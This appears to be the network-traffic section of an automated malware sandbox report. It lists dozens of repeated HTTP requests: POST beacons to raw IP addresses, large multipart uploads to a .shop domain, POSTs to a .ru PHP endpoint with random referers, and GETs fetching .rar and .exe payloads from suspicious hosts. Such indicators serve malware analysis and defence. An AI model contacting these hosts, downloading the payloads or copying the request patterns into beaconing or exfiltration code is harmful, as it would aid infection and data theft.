                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: liernessfornicsa.shop
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: liernessfornicsa.shop
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12842Host: liernessfornicsa.shop
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15069Host: liernessfornicsa.shop
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20431Host: liernessfornicsa.shop
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1232Host: liernessfornicsa.shop
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 531309Host: liernessfornicsa.shop
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: liernessfornicsa.shop
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: liernessfornicsa.shop
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
                  Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mbcyqmttpiinpghx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: gebeus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eyqxnblygic.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: gebeus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://elpsnjvbyqt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: gebeus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xnmfeyqpwnehurxh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: gebeus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eeycidiyfjvuwaep.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: gebeus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qmbakktwarjac.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: gebeus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://feltxgyoedldtlt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: gebeus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wtlgosscvcry.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: gebeus.ru
                  Source: global trafficHTTP traffic detected: GET /systemd.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.221.157.163
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pkqgdawiidcayk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 114Host: gebeus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mmcxxioyukngeefd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: gebeus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://coiniqplnikp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: gebeus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sijoltnxjfxqjw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: gebeus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uwqwnifeydwej.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 179Host: gebeus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jpenaelwjof.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: gebeus.ru
                  Source: global trafficHTTP traffic detected: GET /win.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 64.190.113.113
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tfqtvoxxlfyfid.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 330Host: gebeus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mhvibsdewxn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: gebeus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://akvufandfxiqflw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: gebeus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bqhvneiiyelqwiyv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: gebeus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oqgvummtqov.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: gebeus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vxvnjhhjwdcwv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 289Host: gebeus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wagishcpburncp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: gebeus.ru
